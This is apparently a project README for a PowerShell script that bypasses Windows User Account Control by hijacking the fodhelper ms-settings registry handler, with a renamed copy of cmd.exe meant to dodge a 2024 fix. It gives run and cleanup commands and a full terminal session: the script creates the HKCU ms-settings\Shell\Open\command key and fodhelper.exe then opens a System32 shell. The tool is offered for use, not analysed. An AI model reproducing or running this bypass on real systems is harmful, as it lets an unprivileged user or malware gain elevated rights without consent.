A simple script to bypass UAC using fodhelper process even in the 2024 after "patch" Note: This script is a bit unstable so feel free to modify, its preferable not use as script but exec evry step as powershell command.
Its basicaly the default script for uac bypass that u can find here https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1 But copy cmd from C:\Windows\System32\cmd.exe and rename it. Ofc u can edit process and method.
Basic use
.\hellokittySayHello.ps1
Clearing
.\hellokittySayHello.ps1 -clear
- Add function clear that remove reguster and .exe file
- New Params:
- Destination path
- Username of current user
No. The process of bypass still the same just using copy to bypass the "fix"
Becouse its funny
PS C:\Users\IlMurloDiplomato\Desktop> whoami /priv
INFORMAZIONI PRIVILEGI
----------------------
Nome privilegio Descrizione Stato
============================= ========================================= ============
SeShutdownPrivilege Arresto del sistema Disabilitato
SeChangeNotifyPrivilege Ignorare controllo incrociato Abilitato
SeUndockPrivilege Rimozione del computer dall'alloggiamento Disabilitato
SeIncreaseWorkingSetPrivilege Aumento di un working set di processo Disabilitato
SeTimeZonePrivilege Modifica del fuso orario Disabilitato
PS C:\Users\IlMurloDiplomato\Desktop> .\hellokittySayHello.ps1
Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
Name Property
---- --------
command
DelegateExecute :
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName : command
PSDrive : HKCU
PSProvider : Microsoft.PowerShell.Core\Registry
Hellokitty says Hello! ^.^
PS C:\Users\IlMurloDiplomato\Desktop> ls
Directory: C:\Users\IlMurloDiplomato\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 09/05/2024 17:38 323584 hellokitty.exe
-a---- 25/06/2024 12:45 1302 hellokittySayHello.ps1
PS C:\Users\IlMurloDiplomato\Desktop> fodhelper.exe
PS C:\Users\IlMurloDiplomato\Desktop>
In my case thats open a new terminal
Impossibile trovare il testo del messaggio per il numero di messaggio 0x2350 nel file di messaggio per Application.
(c) Microsoft Corporation. Tutti i diritti riservati.
Risorse di memoria disponibili insufficienti per elaborare il comando.
C:\Windows\System32>